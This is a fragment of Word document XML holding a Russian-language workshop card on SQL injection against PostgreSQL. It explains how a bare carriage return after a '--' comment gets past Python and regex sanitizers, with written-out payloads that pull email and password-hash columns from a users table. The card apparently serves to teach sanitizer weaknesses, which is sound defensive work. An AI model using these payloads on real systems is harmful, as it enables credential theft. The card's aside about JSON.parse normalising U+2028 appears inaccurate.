        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT id,email,password_hash FROM users--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — активный SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C965D2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Атака пройдёт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F81118A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Альтернативная Python-форма sanitizer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558AA995" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def sanitize(q):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439899C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = q.replace('\r\n', '\n')  # CRLF → LF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505099FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = q.replace('\n', '')      # strip LF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F30ADA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = re.sub(r'--.*$', '', q, flags=re.MULTILINE)  # strip --comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49825CE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2932A1BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.MULTILINE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> match-ить любой line-terminator — но Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.MULTILINE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> распознаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как line boundary, не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> остаётся неучтённой. Payload пройдёт через тот же gap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1673ED16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — Unicode line-separator (PG не реагирует — false positive в sanitizer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785B3084" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: sanitizer на JSON-API уровне normalize-ит Unicode line separators (U+2028, U+2029) до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (это часть JSON.parse в Node.js/Python). Атакующий думает, что U+2028 после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — line-terminator для PG. Но это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>неправильно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: PG-парсер считает line-terminator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASCII </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (0x0A) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (0x0D); Unicode-line-separator (U+2028 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\xE2\x80\xA8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в UTF-8) — обычные UTF-8-байты в строке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D613BC0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload (не работает!):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E2211" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin'--harmless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ADE6E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>UNION SELECT password_hash FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52800827" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что доходит до сервера (если sanitizer не trim-ил U+2028):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C5B103" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title FROM articles WHERE title = 'admin'--harmless&lt;U+2028 как 3 байта UTF-8&gt;UNION SELECT password_hash FROM users--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2488B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PG-парсер видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--harmless&lt;U+2028 как байты&gt;UNION ...FROM users--'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комментарий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>до</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> конца строки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), которых здесь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>нет</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (U+2028 — 3 UTF-8 байта, не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t>). Весь остаток вплоть до конца строки — комментарий. Атака не работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379CEEE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Анти-паттерн</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для атакующего: путать sanitizer-нормализацию (которая видит U+2028 как «логическая newline») с PG-парсером (который видит только ASCII </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A84FBE4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Включаем Payload B в карточку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>именно как анти-паттерн</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, чтобы команда DS-workshop знала, что Unicode-line-separator-атака против PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не работает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — в отличие от MySQL/MSSQL, где (по версиям) Unicode-line-terminator-парсинг иногда реализован.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC01E9C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — CR+CRLF mix для обхода regex `\r?\n`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37633D22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: sanitizer регекс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r"--.*?\r?\n"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пытается покрыть и LF, и CRLF, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> non-greedy + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> опциональный — кладёт первого совпавшего, что часто </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Атакующий проталкивает payload с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752D21EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Этот case — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload A в другой форме</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sanitizer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r?\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ожидает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обязательно после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — match не происходит, sanitizer оставляет весь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--text\rINJECTED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как один блок (для него это всё комментарий до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>end-of-string</w:t>
      </w:r>
      <w:r>
        <w:t>, не line-end).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7BACD5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload идентичен Payload A; разница только в формулировке слабости sanitizer-а:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A24D82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin'--harmless\rUNION SELECT id,email,password_hash FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B843DCF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — то же, что и Payload A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B43EFE9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что произойдёт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5857A2F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CR-only обходит sanitizer-ы, нормализующие к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или ищущие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как unit. PG-парсер обрывает комментарий на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t>, активирует injected SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35130DEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload B (анти-паттерн)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Unicode-line-separator U+2028/U+2029 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не работает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> против PG. Только sanitizer/JSON-парсер их «видит» как line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A5281" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — вариант Payload A для sanitizer-а с regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r?\n</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220C000C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416A9664" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG считает `\r` line-terminator-ом независимо от `\n`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это уникальная семантика парсера. Sanitizer-ы, написанные под общую SQL-семантику (где line-terminator только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>), отстают.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31183F7D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Python `re.MULTILINE`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> распознаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как boundary, не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t>. Это контр-интуитивно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A486AFE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
